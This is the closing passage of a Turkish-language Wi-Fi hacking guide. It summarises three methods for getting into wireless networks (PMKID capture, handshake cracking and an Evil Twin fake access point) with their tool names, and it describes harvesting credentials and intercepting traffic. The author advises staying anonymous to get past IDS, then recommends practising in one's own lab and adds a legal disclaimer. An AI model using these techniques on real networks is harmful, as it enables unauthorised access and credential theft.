Tam Ağ Erişimi Kullanıcıların tüm trafiğini dinleyebilirsiniz
Kimlik Bilgileri Kullanıcı adları ve şifreleri toplandı
Saldırı Gizliliği Kullanıcılar meşru AP ile sahte AP’yi ayırt edemez
🧩 ÖZET – ÜÇ YOL, ÜÇ FARKLI SIZMA TEKNİĞİ
Yol Teknik Araçlar Kazanım
1 PMKID Attack hcxdumptool, hcxpcaptool, hashcat İstemci gerekmez, direkt PMKID yakalama
2 Handshake Capture airodump-ng, aireplay-ng, aircrack-ng Klasik el sıkışması ile şifre kırma
3 Evil Twin hostapd, dnsmasq, iptables Kimlik avı, trafik dinleme, yetkisiz erişim
📢 HAZIR SCRIPT DEĞİL, GERÇEK BİLGİ
Bu rehberde anlattığım her komut, her çıktı saf bilgidir. Hazır betikler başkasının emeğidir. Ancak bu bilgileri öğrendiğinizde, kimseye ihtiyacınız kalmaz. Ağı dinleyen, şifreyi kıran ve sahte AP kuran kişi siz olursunuz. Unutmayın: Gerçek hacker, aracı değil, tekniği bilendir.
🧠 UNUTMA: OPSEC HER ŞEYDİR
Bu üç yöntemi uygulamadan önce anonim olduğunuzdan emin olun. Aksi halde hedef ağın güvenlik duvarları ve IDS/IPS sistemleri sizi yakalar. OPSEC rehberimi okuyun: “Anonim Kalma – Her Seviye İçin Delicesine Anonimlik (OPSEC)” .
🔚;
Artık üç farklı Wi-Fi hacking yöntemini biliyorsunuz. PMKID ile istemci gerektirmeden, klasik handshake ile bağlı istemci varken, Evil Twin ile de kimlik avı ve trafik dinleme yaparak Wi-Fi ağlarına sızabilirsiniz. Gerisi pratik. Kendi laboratuvarınızda (Kali + Alfa adaptör + test router) bu adımları deneyin. Her şey aynen çalışacaktır.
Hedef KurumsalWiFi değil, sizin kendi kurduğunuz sistemler olmalıdır. Hata yapma özgürlüğünüz sadece kendi labınızda vardır.
Ve unutmayın: Savunması olmayanın saldırısı, sadece intihardır.
Bu rehber, eğitim ve farkındalık için yazılmıştır. Yetkisiz ağlara erişim yasa dışıdır. Tüm sorumluluk kullanıcıya aittir.
@Tc4dy | github.com/tc4dy
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl